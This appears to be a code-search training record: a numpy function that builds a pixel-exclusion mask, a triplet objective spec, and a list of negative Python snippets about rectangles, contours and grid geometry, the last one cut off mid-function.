def _build_list_of_excluded_pixels2(self, exclude_zones, img_width, img_height): full_image = numpy.ones((img_height, img_width), dtype=uint8) for x, y, width, height in exclude_zones: # creates a matrix where 0 is placed on pixels to exclude, and 1 on pixel to keep exclusion = numpy.zeros((height, width), dtype=uint8) exclusion = numpy.pad(exclusion, ((min(y, img_height) , max(0, img_height - (y + height))), (min(x, img_width), max(0, img_width - (x + width)))), constant_values=1) full_image *= exclusion[0:img_height, 0:img_width] # crop exclusion array if it's size is higher than image (exclusion zone outside of image dimensions) return full_image
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def rect(rows: int, cols: int, top: int = 0,\n left: int = 0) -> List['GridQubit']:\n return [\n GridQubit(row, col)\n for row in range(top, top + rows)\n for col in range(left, left + cols)\n ]", "def find_rects(image: np.ndarray) -> List[np.ndarray]:\n\n gray = cv.cvtColor(image.copy(), cv.COLOR_RGB2GRAY)\n gray = cv.GaussianBlur(gray, (5, 5), 0)\n #edged = cv.Canny(gray, 70, 180) # this numbers is hand picked guess from a few photos\n edged = auto_canny(gray)\n\n contours = cv.findContours(edged.copy(), cv.RETR_LIST, cv.CHAIN_APPROX_SIMPLE)\n contours = contours[0] if len(contours) == 2 else contours[1]\n contours.sort(key=cv.contourArea, reverse=True)\n contours = [cnt for cnt in contours if cv.contourArea(cnt) > 15] # 15px contour area, basically cnt>=4x4\n\n rects = list(map(cv.minAreaRect, contours))\n boxes = list(map(lambda r: Rect.from_cvrect(*r[0], *r[1]), rects))\n\n boxes = Rect.nms_merge(boxes)\n\n return boxes or list()", "def extract_valid_rects(rects, img, others_landmark_pts):\n # Extraction\n dst = list()\n for rect in rects:\n # Check if others landmarks are contained\n for others_pt in others_landmark_pts:\n if rect_contain(rect, others_pt):\n break\n else:\n dst.append(rect)\n\n # avoid no rectangle\n if len(dst) == 0:\n dst.append((0, 0, img.shape[1], img.shape[0]))\n\n return dst", "def normalizeRects(rects):\n\tsmallestX = min(rect[0] for rect in rects)\n\tsmallestY = min(rect[1] for rect in rects)\n\treturn list(\n\t\t(-smallestX + left,\n\t\t -smallestY + top,\n\t\t -smallestX + right,\n\t\t -smallestY + bottom) for left, top, right, bottom in rects\n\t)", "def find_overlap_rect_list(rect_list):\n\n\n overlap_list = []\n\n for index, item in enumerate(rect_list):\n index += 1\n\n while index < len(rect_list):\n #check item with next rectangle in the list\n x_overlap = find_overlap_range(item['left_x'], item['width'], \n rect_list[index]['left_x'],\n rect_list[index]['width'])\n \n y_overlap = find_overlap_range(item['bottom_y'], item['height'], \n rect_list[index]['bottom_y'],\n rect_list[index]['height'])\n\n if x_overlap and y_overlap:\n overlap_list.append({'left_x':x_overlap[0], \n 'bottom_y': y_overlap[0],\n 'width': x_overlap[1],\n 'height': y_overlap[1]})\n\n index += 1\n\n return overlap_list", "def getBigRectangles(recognisedFacesCenters, recognisedFacesPercentages, recognisedFacesCenterSizes):\n recognisedBigFacesCenters = []\n recognisedBigFacesCentersSizes = []\n recognisedBigFacesPercentages = []\n\n \"\"\"Putting the higest probability frame in the final array by default\"\"\"\n maxvalueCenters = max(recognisedFacesPercentages)\n maxposCenters = recognisedFacesPercentages.index(maxvalueCenters)\n\n recognisedBigFacesCenters.append(recognisedFacesCenters[maxposCenters])\n recognisedBigFacesCentersSizes.append(\n recognisedFacesCenterSizes[maxposCenters])\n recognisedBigFacesPercentages.append(\n recognisedFacesPercentages[maxposCenters])\n\n \"\"\"Purging initial arrays of the values we just put in the final arrays\"\"\"\n recognisedFacesCenters.pop(maxposCenters)\n recognisedFacesPercentages.pop(maxposCenters)\n recognisedFacesCenterSizes.pop(maxposCenters)\n\n for i in range(len(recognisedFacesCenters)):\n maxvalueCenters = max(recognisedFacesPercentages)\n maxposCenters = recognisedFacesPercentages.index(maxvalueCenters)\n test = getTowCornersOfRectangle(\n recognisedFacesCenters[maxposCenters], recognisedFacesCenterSizes[maxposCenters], recognisedBigFacesCenters, recognisedBigFacesCentersSizes)\n \"\"\"If the area are not overlapping then add the tested frame into the final arrays\"\"\"\n if(test == 1):\n recognisedBigFacesCenters.append(\n recognisedFacesCenters[maxposCenters])\n recognisedBigFacesCentersSizes.append(\n recognisedFacesCenterSizes[maxposCenters])\n recognisedBigFacesPercentages.append(\n recognisedFacesPercentages[maxposCenters])\n \"\"\"Purging initial arrays of the tested values\"\"\"\n recognisedFacesCenters.pop(maxposCenters)\n recognisedFacesPercentages.pop(maxposCenters)\n recognisedFacesCenterSizes.pop(maxposCenters)\n return [recognisedBigFacesCenters, recognisedBigFacesCentersSizes, recognisedBigFacesPercentages]", "def get_rectangles_from_mask(img_arr):\n masks_point_dict = _get_mask_points(img_arr)\n mar_list = list()\n for object_id in masks_point_dict.keys():\n mask_points = masks_point_dict[object_id]\n mask_points = tuple(mask_points)\n hull_ordered = [mask_points[index] for index in ConvexHull(mask_points).vertices]\n hull_ordered.append(hull_ordered[0]) # making it cyclic, now first and last point are same\n\n # not a rectangle\n if len(hull_ordered) < 5:\n continue\n\n hull_ordered = tuple(hull_ordered)\n min_rectangle = _bounding_area(0, hull_ordered)\n for i in range(1, len(hull_ordered) - 1):\n rectangle = _bounding_area(i, hull_ordered)\n if rectangle['area'] < min_rectangle['area']:\n min_rectangle = rectangle\n\n min_rectangle['unit_vector_angle'] = atan2(min_rectangle['unit_vector'][1],\n min_rectangle['unit_vector'][0])\n\n min_rectangle['rectangle_center'] = _to_xy_coordinates(min_rectangle['unit_vector_angle'],\n min_rectangle['rectangle_center'])\n rect_corners = _rectangle_corners(min_rectangle)\n\n rect_corners = tuple(rect_corners)\n points_ordered = [rect_corners[index] for index in ConvexHull(rect_corners).vertices]\n mar_list.append(points_ordered)\n return mar_list", "def get_panels(rectangles):\n\n pairs = []\n for rect in rectangles:\n if (2 * rect[1][0] < rect[1][1]) or (rect[1][0] > 2 * rect[1][1]):\n if 2 * rect[1][0] < rect[1][1]:\n long_dim1 = 0\n elif rect[1][0] > 2 * rect[1][1]:\n long_dim1 = 1\n\n box = cv2.boxPoints(rect)\n box2 = []\n min_angle = 10;\n for rect2 in rectangles:\n if 2 * rect[1][0] < rect[1][1]:\n long_dim2 = 0\n elif rect[1][0] > 2 * rect[1][1]:\n long_dim2 = 1\n if (rect2 != rect) and (abs(rect[2] - rect2[2]) < min_angle) and (long_dim1 == 1 and long_dim2 == 1):\n box2 = cv2.boxPoints(rect2)\n min_angle = abs(rect[2] - rect2[2])\n\n if len(box2) != 0:\n box_pair = (box, box2)\n pairs.append(box_pair)\n\n return pairs", "def draw_rects(img, rects, color):\n for x1, y1, x2, y2 in rects:\n cv2.rectangle(img, (x1, y1), (x2, y2), color, 2)", "def rectpolyctl(xmin,xmax,ymin,ymax):\n pc=[]\n pc.append((xmin,ymin))\n pc.append((xmin,ymax))\n pc.append((xmax,ymax))\n pc.append((xmax,ymin))\n pc.append((xmin,ymin))\n return pc", "def crop_to_regions(img: np.ndarray, check_areas: List[Dict[str, List[int]]]) -> List[np.ndarray]:\n ret = []\n for region in check_areas:\n from_x = region['start'][0]\n from_y = region['start'][1]\n to_x = from_x + region['size'][0]\n to_y = from_y + region['size'][1]\n # Don't overflow\n to_x = to_x if to_x < img.shape[1] else img.shape[1] - 1\n to_y = to_y if to_y < img.shape[0] else img.shape[0] - 1\n ret.append(img[from_y:to_y, from_x:to_x])\n return ret", "def overlap_list_rect(list_rects):\n overlap = {}\n x_points = []\n y_points = []\n\n for rect in list_rects:\n x_points.append([rect['left_x'], rect['width']])\n y_points.append([rect['bottom_y'], rect['height']])\n\n x_overlap = find_overlap_range_list(x_points)\n\n y_overlap = find_overlap_range_list(y_points)\n\n if x_overlap and y_overlap:\n overlap['left_x'] = x_overlap[0]\n overlap['bottom_y'] = y_overlap[0]\n overlap['width'] = x_overlap[1]\n overlap['height'] = y_overlap[1]\n \n return overlap", "def get_rectangles_mask(self, thresh: np.ndarray) -> np.ndarray:\r\n contours = cv.findContours(thresh, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)[0]\r\n mask = np.zeros(thresh.shape, np.uint8)\r\n good_contours = sorted(\r\n [cnt for cnt in contours if 100000 < cv.contourArea(cnt) < 200000],\r\n key=cv.contourArea,\r\n )\r\n\r\n setattr(self, \"contour1\", good_contours[0])\r\n setattr(\r\n self,\r\n \"contour2\",\r\n good_contours[1]\r\n if cv.pointPolygonTest(\r\n good_contours[1], tuple(good_contours[0][0][0]), False\r\n )\r\n < 0\r\n else good_contours[2],\r\n )\r\n\r\n cv.drawContours(mask, [self.contour1], 0, 255, -1)\r\n cv.drawContours(mask, [self.contour2], 0, 255, -1)\r\n\r\n return mask", "def __init_rect_list(self, ind, min_prob = 0.5):\n #bbox_label_pred = self.net.tops['bbox_label'].data[ind]\n #binary_pred = self.net.tops['binary_label'].data[ind]\n bottom_height = self.image_height\n bottom_width = self.image_width\n bbox_label_pred = self.net.tops['bbox_pred'].data[ind]\n binary_pred = self.net.tops['binary_softmax'].data[ind]\n label_pred = self.net.tops['label_softmax'].data[ind]\n \n (_, top_height, top_width) = bbox_label_pred.shape\n y_mul = bottom_height * 1. / top_height\n x_mul = bottom_width * 1. / top_width\n rect_list = []\n for y in xrange(top_height):\n for x in xrange(top_width):\n # corresponds to indices in original image\n cx_orig = x_mul * (x + 0.5)\n cy_orig = y_mul * (y + 0.5)\n\n # we predict a symbol here if p(no label) < x\n if binary_pred[0, y, x] < 0.5:\n k = np.argmax(label_pred[:, y, x]) \n #if label_pred[k, y, x] < 0.2: continue\n\n # apply offsets to get positions in original image\n cx = cx_orig + bbox_label_pred[0, y, x]\n cy = cy_orig + bbox_label_pred[1, y, x]\n w = bbox_label_pred[2, y, x]\n h = bbox_label_pred[3, y, x]\n xmin = cx - w / 2.0\n ymin = cy - h / 2.0\n rect = Rect(xmin, ymin, xmin + w, ymin + h, label=k, prob=label_pred[k, y, x])\n rect_list.append(rect)\n\n return rect_list", "def CV_rectangles(self,XYSP):\n X,Y,S,P = XYSP\n rectangles=[]\n for i in range(3):\n for j in range(3):\n rectangles.append([(X+i*S+i*P,Y+j*S+j*P),\\\n (X+i*S+i*P+S,Y+j*S+j*P+S)])\n return rectangles", "def recursive_rectangles((x, y), (x0, y0)=(0, 0)):\n x, dx = max(x, x0), min(x, x0)\n y, dy = max(y, y0), min(y, y0)\n if (dx, dy) == (0, 0):\n return _recursive_rectangles(x, y)\n rects = _recursive_rectangles(x - dx, y - dy)\n # return set(map(lambda x: tuple(map(tuple, np.array(x) + (dx, dy))), rects))\n return set(((x1 + dx, y1 + dy), (x2 + dx, y2 + dy)) for ((x1, y1), (x2, y2)) in rects)", "def cover_rect_with_circles(w, h, r):\n\n # initialize result list\n res = []\n\n # horizontal distance between circle centers\n x_dist = math.sqrt(3) * r\n # vertical distance between circle centers\n y_dist = 1.5 * r\n # number of circles per row (different for even/odd rows)\n cnt_x_even = math.ceil(w / x_dist)\n cnt_x_odd = math.ceil((w - x_dist / 2) / x_dist) + 1\n # number of rows\n cnt_y = math.ceil((h - r) / y_dist) + 1\n\n y_offs = 0.5 * r\n for y in range(cnt_y):\n if y % 2 == 0:\n # shift even rows to the right\n x_offs = x_dist / 2\n cnt_x = cnt_x_even\n else:\n x_offs = 0\n cnt_x = cnt_x_odd\n\n for x in range(cnt_x):\n res.append((x_offs + x * x_dist, y_offs + y * y_dist))\n\n # top-right circle is not always required\n if res and not rect_circle_collision(0, w, 0, h, res[-1][0], res[-1][1], r):\n res = res[0:-1]\n\n return res", "def _build_list_of_excluded_pixels(self, exclude_zones):\n \n pixels = []\n for x, y, width, height in exclude_zones:\n for row in range(height):\n for col in range(width):\n pixels.append(Pixel(col + x, row + y))\n \n return pixels", "def draw_rects(in_img, rects, colour=(255, 0, 0)):\n img = convert_when_colour(colour, in_img.copy())\n thickness = int(max(img.shape) / 150)\n for rect in rects:\n img = cv2.rectangle(\n img,\n tuple(int(x) for x in rect[0]),\n tuple(int(x) for x in rect[1]),\n colour,\n thickness,\n )\n return img", "def find_rects_white(image: np.ndarray) -> List[np.ndarray]:\n\n raise NotImplementedError()\n\n #gray = norm_color_test(image.copy())\n gray = cv.cvtColor(image.copy(), cv.COLOR_RGB2GRAY)\n gray = cv.GaussianBlur(gray, (5, 5), 0)\n #edged = cv.Canny(gray, 70, 180) # this numbers is hand picked guess from a few photos\n edged = auto_canny(gray) # this numbers is hand picked guess from a few photos\n\n # split to HSV, then pick up rouhly any white color zeroing out the rest\n hsv = cv.cvtColor(image.copy(), cv.COLOR_RGB2HSV)\n h,s,v = cv.split(hsv)\n h[h<145] = 0\n h[h>165] = 0\n #h = cv.GaussianBlur(h, (5, 5), 0)\n normed = cv.normalize(h, None, 0, 255, cv.NORM_MINMAX, cv.CV_8UC1)\n kernel = cv.getStructuringElement(shape=cv.MORPH_ELLIPSE, ksize=(5,5))\n opened = cv.morphologyEx(normed, cv.MORPH_OPEN, kernel)\n\n # now find white regions contours\n whites = cv.findContours(opened, cv.RETR_LIST, cv.CHAIN_APPROX_SIMPLE)[0]\n whites.sort(key=cv.contourArea, reverse=True)\n whites = [cnt for cnt in whites if cv.contourArea(cnt) > 15] # 15px contour area, basically cnt>=4x4\n\n whiterects = []\n for i in whites:\n rect = cv.minAreaRect(i)\n w,h = rect[1]\n if w*h > 150: # 150px area, or rougly 12x12 pixels\n whiterects.append(rect)\n\n #cv.drawContours(image, whites, -1, COLORS[2 % len(COLORS)], 2)\n #cv.imshow('test', image)\n #cv.waitKey()\n\n whites = list(map(lambda r: Rect.from_cvrect(*r[0], *r[1]), whiterects))\n\n\n\n #cv.imshow('test', edged)\n #cv.waitKey()\n\n contours = cv.findContours(edged.copy(), cv.RETR_LIST, cv.CHAIN_APPROX_SIMPLE)\n contours = contours[0] if len(contours) == 2 else contours[1]\n contours.sort(key=cv.contourArea, reverse=True)\n contours = [cnt for cnt in contours if cv.contourArea(cnt) > 15] # 15px contour area, basically cnt>=4x4\n\n rects = list(map(cv.minAreaRect, contours))\n boxes = list(map(lambda r: Rect.from_cvrect(*r[0], *r[1]), rects))\n\n # filter non overlapping contours\n for i in reversed(range(len(boxes))):\n overlaps = False\n for wbox in whites:\n if wbox.overlaps(boxes[i]):\n overlaps = True\n break\n if not overlaps:\n boxes.pop(i)\n\n boxes = Rect.nms_merge(boxes)\n\n for i in range(len(contours)):\n #peri = cv.arcLength(contours[i], True)\n #approx = cv.approxPolyDP(contours[i], 0.02 * peri, True)\n rect = cv.minAreaRect(contours[i])\n box = cv.boxPoints(rect)\n box = np.int0(box)\n #cv.drawContours(image, [box], -1, COLORS[i % len(COLORS)], 2)\n #cv.putText(image, f'{i}: {cv.contourArea(contours[i])}px', (int(rect[0][0]), int(rect[0][1])), cv.FONT_HERSHEY_SIMPLEX, 0.6, COLORS[i % len(COLORS)], 1)\n\n #cv.drawContours(image, contours, -1, COLORS[1], 2)\n\n for b in boxes:\n cv.line(image, (int(b.xmin), int(b.ymin)), (int(b.xmax), int(b.ymin)), (0, 255, 255), 2)\n cv.line(image, (int(b.xmin), int(b.ymax)), (int(b.xmax), int(b.ymax)), (0, 255, 255), 2)\n cv.line(image, (int(b.xmin), int(b.ymin)), (int(b.xmin), int(b.ymax)), (0, 255, 255), 2)\n cv.line(image, (int(b.xmax), int(b.ymin)), (int(b.xmax), int(b.ymax)), (0, 255, 255), 2)\n\n stacked = np.hstack( (cv.cvtColor(edged, cv.COLOR_GRAY2RGB), cv.cvtColor(opened, cv.COLOR_GRAY2RGB), image))\n cv.namedWindow('test', 0)\n cv.imshow('test', stacked)\n cv.waitKey()\n\n cv.imwrite('dump.jpg', stacked)\n\n\n return boxes or list()", "def _cells_for_rect(self, r):\n cells = set()\n cy = floor(r.y1 / self.cell_size)\n while (cy * self.cell_size) <= r.y2:\n cx = floor(r.x1 / self.cell_size)\n while (cx * self.cell_size) <= r.x2:\n cells.add((int(cx), int(cy)))\n cx += 1.0\n cy += 1.0\n return cells", "def draw_rects_on_img(img, rects):\n img_copy = img.copy()\n for rect in rects:\n x, y, w, h = rect\n cv2.rectangle(img_copy, (x,y), (x+w,y+h), (0,255,0), 2)\n return img_copy", "def list_square_inches(claim):\n return [(x, y)\n for x in range(claim['left'], claim['right'])\n for y in range(claim['top'], claim['bottom'])]", "def draw_rects(self, L, col):\n for (i, j) in L:\n self.draw_rect(i, j, col)", "def under_rect(self, rect):\n x_min = self.clampx((rect.left - self._origin.x) // self._cell_size[0])\n x_max = self.clampx((rect.right - self._origin.x) // self._cell_size[0])\n y_min = self.clampy((rect.top - self._origin.y) // self._cell_size[1])\n y_max = self.clampy((rect.bottom - self._origin.y) // self._cell_size[1])\n cells = []\n for ix in range(x_min, x_max + 1):\n for iy in range(y_min, y_max + 1):\n index = iy * self._cell_count[0] + ix\n cells.append(self._cells[index])\n return cells", "def get_random_rectangles(self):\n while len(self.rectangles) < self.n_rectangles:\n upper_left = [np.random.randint(0, 28) for i in range(2)] # upper-left corner coordinate\n lower_right = [np.random.randint(0, 28) for i in range(2)] # lower-right corner coordinate\n # Have upper left corner less than lower right corner of the rectangle\n if upper_left[0] < lower_right[0] and upper_left[1] < lower_right[1]:\n currentRect = Rectangle(upper_left, lower_right)\n currentArea = currentRect.area()\n # Only keep the rectangles whose area is 130 to 170\n if 130 <= currentArea <= 170:\n self.rectangles.append(currentRect)\n #print(\"Upper Left \", upper_left, \" Lower right \", lower_right, \" Area: \", currentRect.area())", "def _rectangles(m, n):\n return m * (m+1) * n * (n+1) // 4", "def get_rectangles(mask, threshold_area):\n contours, hierarchy = cv2.findContours(mask,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n\n rectangles = []\n for contour in contours:\n if cv2.contourArea(contour) > threshold_area:\n rect = cv2.boundingRect(contour)\n rectangles.append(rect)\n return rectangles", "def get_rectangles(mask, threshold_area):\n contours, hierarchy = cv2.findContours(mask,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n\n rectangles = []\n for contour in contours:\n if cv2.contourArea(contour) > threshold_area:\n rect = cv2.boundingRect(contour)\n rectangles.append(rect)\n return rectangles", "def cell_regions(\n x_len: float, y_len: float, factor: float = 2 / 3, buffer: float = 3.5\n) -> Tuple[List[List[float]], ...]:\n x_min, x_max = x_len / 2, -x_len / 2\n y_min, y_max = y_len / 2, -y_len / 2\n\n cell = [[x_min, x_max, x_max, x_min], [y_min, y_min, y_max, y_max]]\n\n liq = [\n [\n x_min * factor + buffer,\n x_max * factor - buffer,\n x_max * factor - buffer,\n x_min * factor + buffer,\n ],\n [\n y_min * factor + buffer,\n y_min * factor + buffer,\n y_max * factor - buffer,\n y_max * factor - buffer,\n ],\n ]\n\n crys = [\n [\n x_min * factor - buffer,\n x_max * factor + buffer,\n x_max * factor + buffer,\n x_min * factor - buffer,\n ],\n [\n y_min * factor - buffer,\n y_min * factor - buffer,\n y_max * factor + buffer,\n y_max * factor + buffer,\n ],\n ]\n\n return cell, liq, crys", "def get_boxes():\n boxes = []\n\n box_sizes = [256]\n left_x_cords = [x for x in range(0,1280,12)]\n top_y_cords = [y for y in range(360,720,12)]\n\n for box_size in box_sizes:\n for x_cord in left_x_cords:\n for y_cord in top_y_cords:\n if box_size+x_cord < 1280 and box_size+y_cord < 720:\n boxes.append([x_cord, y_cord, x_cord+box_size, y_cord+box_size])\n\n return boxes", "def build_list_of_champion_cards_rectangles(\n CARDS_TO_BUY_AMOUNT_=CARDS_TO_BUY_AMOUNT,\n Y_FIRST_CHAMPION_CARD_=Y_FIRST_CHAMPION_CARD,\n W_CHAMPION_CARD_=W_CHAMPION_CARD,\n H_CHAMPION_CARD_=H_CHAMPION_CARD,\n):\n logging.debug(\"Function build_list_of_champion_cards_rectangles() called\")\n\n cards_rectangles = [0] * CARDS_TO_BUY_AMOUNT_\n for i in range(0, CARDS_TO_BUY_AMOUNT_):\n top_left = (calculate_card_position_on_screen(i), Y_FIRST_CHAMPION_CARD_)\n bottom_right = (\n calculate_card_position_on_screen(i) + W_CHAMPION_CARD_,\n Y_FIRST_CHAMPION_CARD_ + H_CHAMPION_CARD_,\n )\n center = (\n top_left[0] + W_CHAMPION_CARD_ // 2,\n top_left[1] + H_CHAMPION_CARD_ // 2,\n )\n # print(\"Type\" ,type(center))\n cards_rectangles[i] = [top_left, bottom_right, center]\n\n logging.debug(\"Function build_list_of_champion_cards_rectangles() end\")\n return cards_rectangles", "def _find_corners(self) -> list:\n width, height = self.width, self.height\n return [(0, 0), (width, 0), (0, height), (width, height)]", "def rectangleindices(self):\n return {r.n for r in self.rectangles}", "def boundingRectPoints(cnt):\n\tx, y, w, h = cv2.boundingRect(cnt)\n\tfirst = (x, y)\n\tend = (x+w, y+h)\n\treturn {\"top-left\": first, \"bottom-right\":end}", "def to_area(x, y, w, h, bottom_only=False):\n cover = []\n if bottom_only:\n for i in range(int(ceil(w))):\n cover.append((int(x)+i, int(y+ceil(h)-1)))\n else:\n for i in range(int(ceil(w))):\n for j in range(int(ceil(h))):\n cover.append((int(x)+i, int(y)+j))\n\n return cover", "def find_rect(self, data_3d):\n datax = [i[0] for i in data_3d]\n datay = [i[1] for i in data_3d]\n\n return min(datax), max(datax), min(datay), max(datay)", "def rectangles_in_grid(x_f, y_f):\n count = 0\n for x in range(x_f):\n for y in range(y_f):\n for i in range(x, x_f):\n for j in range(y, y_f):\n count += 1\n return count", "def get_pair_rects(contours):\n\n rect_pairs = []\n for index, cnt in enumerate(contours):\n # Rotated rect - ( center (x,y), (width, height), angle of rotation )\n rect = cv2.minAreaRect(cnt)\n center_x, center_y = rect[0]\n rect_angle = -round(rect[2], 2)\n\n if rect_angle > 45.0:\n # Iterate through all of the potential matches\n min_x_dist = min_rect = min_index = None\n for pot_index, pot_match in enumerate(contours):\n if np.array_equal(pot_match, cnt):\n continue\n\n match_rect = cv2.minAreaRect(pot_match)\n\n # Check if match is to the right of the contour\n if match_rect[0][0] > rect[0][0] and abs(\n match_rect[2] - rect_angle) > ANGLE_TOLERANCE_DEG:\n x_distance = match_rect[0][0] - rect[0][0]\n\n if min_x_dist is None or x_distance < min_x_dist:\n min_x_dist = x_distance\n min_rect = match_rect\n min_index = pot_index\n\n if min_rect is not None:\n rect_pairs.append((rect, min_rect))\n np.delete(contours, index)\n np.delete(contours, min_index)\n\n return rect_pairs", "def get_surroundings(matrix, coord):\n width = np.shape(matrix)[0]\n height = np.shape(matrix)[1]\n coordinates = []\n\n # top\n (\n coordinates.append((coord[0], coord[1] - 1))\n if coord[1] - 1 >= 0\n else None\n )\n # bottom\n (\n coordinates.append((coord[0], coord[1] + 1))\n if coord[1] + 1 < height\n else None\n )\n # left\n (\n coordinates.append((coord[0] - 1, coord[1]))\n if coord[0] - 1 >= 0\n else None\n )\n # right\n (\n coordinates.append((coord[0] + 1, coord[1]))\n if coord[0] + 1 < width\n else None\n )\n\n return coordinates", "def _recursive_encoded_rectangles(x, y):\n if x < 1 or y < 1:\n raise ValueError(\"Invalid input\")\n if x == 1 and y == 1:\n return {encode_rectangle_to_int(((1, 1), (0, 0))), } # Must return a set\n if x == 1:\n return _recursive_encoded_rectangles(x, y-1) | set(encode_rectangle_to_int(((0, j), (x, y))) for j in range(y))\n if y == 1:\n return _recursive_encoded_rectangles(x-1, y) | set(encode_rectangle_to_int(((i, 0), (x, y))) for i in range(x))\n return _recursive_encoded_rectangles(x-1, y) | _recursive_encoded_rectangles(x, y-1) | \\\n set(encode_rectangle_to_int(((i, j), (x, y))) for i in range(x) for j in range(y))", "def recursive_encoded_rectangles((x, y), (x0, y0)=(0, 0)):\n x, dx = max(x, x0), min(x, x0)\n y, dy = max(y, y0), min(y, y0)\n if (dx, dy) == (0, 0):\n return _recursive_encoded_rectangles(x, y)\n rects = _recursive_encoded_rectangles(x - dx, y - dy)\n func = partial(translate_encoded_rectangle, vector=(dx, dy))\n return set(map(func, rects))", "def get_background_pixels(img, rect):\n mask = np.zeros(img.shape[:2], np.uint8)\n bg_model = np.zeros((1,65), np.float64)\n fg_model = np.zeros((1,65), np.float64)\n cv2.grabCut(img, mask, rect, bg_model, fg_model, 5, cv2.GC_INIT_WITH_RECT)\n flattened = mask.flatten()\n background_coords = np.where((flattened == 0) | (flattened == 2))\n return background_coords", "def images_at(self, rects, colorkey = None):\n return [self.image_at(rect, colorkey) for rect in rects]", "def _get_tiles(self, width: Numeric) -> List[Polygon]:\n min_x, min_y, max_x, max_y = self._get_rounded_bounding_box(self.geom, width)\n tiles = []\n\n for i in range(0, int((max_x - min_x) / width)):\n for j in range(0, int((max_y - min_y) / width)):\n tile = box(\n (i * width) + min_x,\n (j * width) + min_y,\n ((i + 1) * width) + min_x,\n ((j + 1) * width) + min_y,\n )\n\n if self.geom.intersects(tile):\n tiles.append(tile)\n\n return tiles", "def rasterize(con, cellSize=50, xMin=None, yMin=None, xMax=None, yMax=None):\n\n if xMin is None or yMin is None or xMax is None or yMax is None:\n _xMin, _yMin, _xMax, _yMax = con.bounds\n if xMin is None:\n xMin = _xMin\n if yMin is None:\n yMin = _yMin\n if xMax is None:\n xMax = _xMax\n if yMax is None:\n yMax = _yMax\n\n hitXMax = False\n hitYMin = False\n xSlice = 0\n ySlice = 0\n halfCellSize = cellSize / 2.0\n bitmap = []\n\n while not hitYMin:\n bitmap.append([])\n yScan = -(ySlice * cellSize + halfCellSize) + yMax\n if yScan < yMin:\n hitYMin = True\n while not hitXMax:\n xScan = (xSlice * cellSize + halfCellSize) + xMin\n if xScan > xMax:\n hitXMax = True\n test = con.pointInside((xScan, yScan))\n if test:\n bitmap[-1].append(True)\n else:\n bitmap[-1].append(False)\n xSlice = xSlice + 1\n hitXMax = False\n xSlice = 0\n ySlice = ySlice + 1\n\n return bitmap", "def collision_test(rect, tiles):\r\n hit_list = []\r\n for tile in tiles:\r\n if rect.colliderect(tile):\r\n hit_list.append(tile)\r\n return hit_list", "def rectangles_in_cross_hatch(x_f, y_f):\n x0, y0 = 0, 0\n Q = np.matrix(((1, -1), (1, 1))) # Transformation matrix to cross-hatch coordinates (counter-clockwise)\n I = Q.I # Inverse transformation matrix back to grid coordinates\n y_prime_max = ((x0, y_f)*Q)[(0,1)] # Top-left of rectangle defines maximum y-value for cross-hatch coordinates\n y_prime_min = ((x_f, y0)*Q)[(0,1)] # Bottom-right defines minimum y-value\n x_prime_max = ((x_f, y_f)*Q)[(0,0)] # Top-right defines maximum x-value\n x_prime_min = 0 # Bottom-left corner remains at the origin\n x_prime_min += 1; y_prime_min += 1 # Add 1 because outer row of cross-hatch has no rectangles within the grid\n\n count = 0\n for x_prime in range(x_prime_min, x_prime_max):\n for y_prime in range(y_prime_min, y_prime_max):\n point = (x_prime, y_prime)*I\n x, y = point.A1 # .A1 flattens to allow easy assignment\n if x >= x0 and y >= y0: # Bottom corner is within bounds of grid\n for i in range(x_prime+1, x_prime_max):\n if ((i, y_prime)*I).A1[0] > x_f: break # Right corner out of grid; done with this x', y'\n for j in range(y_prime+1, y_prime_max):\n if ((x_prime, j)*I).A1[0] < x0: break # Left corner out of grid\n if ((i, j)*I).A1[1] > y_f: break # Top corner out of grid\n count += 1 # All 4 corners within bounds of grid\n return count", "def rect_union(class_list):\n if len(class_list) >= 1:\n rect_list = []\n for class_object in class_list:\n rect_list.append(class_object.rect)\n return rect_list[0].unionall(rect_list[1:])\n else:\n return Rect(0,0,0,0)", "def recognize_pieces(edges, v, squares):\n\n pieces = []\n\n v = cv2.equalizeHist(v)\n for p1, p2 in squares:\n # count the number of slightly centered edges\n occupancy = sum(edges[y][x]\n for x in range(p1.x + 5, p2.x - 5)\n for y in range(p1.y + 5, p2.y - 5))\n\n if occupancy > 70*255:\n corners = (v[p1.y][p1.x], v[p1.y][p2.x],\n v[p2.y][p1.x], v[p2.y][p2.x])\n\n # average v-component of the corners\n avg = sum(map(float, corners)) / len(corners)\n\n # black pixels should be relatively black\n # when compared to the corner average\n black = sum(v[y][x] / avg < 0.2\n for x in range(p1.x, p2.x + 1)\n for y in range(p1.y, p2.y + 1))\n\n if black >= 1000 and black != 1049:\n color = \"B\"\n else:\n color = \"W\"\n\n pieces.append(color)\n else:\n pieces.append(None)\n\n return pieces", "def get_foreground_pixels(img, rect):\n mask = np.zeros(img.shape[:2], np.uint8)\n bg_model = np.zeros((1,65), np.float64)\n fg_model = np.zeros((1,65), np.float64)\n cv2.grabCut(img, mask, rect, bg_model, fg_model, 5, cv2.GC_INIT_WITH_RECT)\n flattened = mask.flatten()\n mask2 = np.where((mask == 2) | (mask == 0), 0, 1).astype('uint8')\n img = img * mask2[:,:,np.newaxis]\n # SHOW IMAGE\n # cv2.imshow(\"picture\",img)\n # cv2.waitKey(100)\n background_coords = np.where((flattened == 1) | (flattened == 3))\n # return (img , background_coords)\n ListBG = [len(background_coords[0])]\n ListBG.extend(list(background_coords[0]))\n return ListBG", "def phantom_rectangles(n_points,R):\n \n \n #Rescaling according to image size \n R[:,0] = R[:,0]*n_points/2\n R[:,1] = R[:,1]*n_points/2\n R[:,2] = R[:,2]*n_points/2\n R[:,3] = R[:,3]*n_points/2\n R[:,4] = R[:,4]*math.pi/180\n \n x,y = np.meshgrid(np.arange(0,n_points)-n_points//2 ,np.arange(0,n_points)-n_points//2 )\n nrow,ncol = R.shape\n phantom1 = np.zeros((y.shape[0], y.shape[1], nrow))\n\n for k in range(nrow): #itero sui rettangoli\n x_new = x - R[k,0]\n y_new = y - R[k,1]\n\n u = abs(x_new*math.cos(R[k,4])+y_new*math.sin(R[k,4]))\n v = abs(-x_new*math.sin(R[k,4])+y_new*math.cos(R[k,4]))\n\n for i in range(x.shape[0]):\n for j in range(x.shape[1]):\n if (u[i,j] < R[k,2]/2 and v[i,j] < R[k,3]/2):\n phantom1[i,j,k] = R[k,5]; 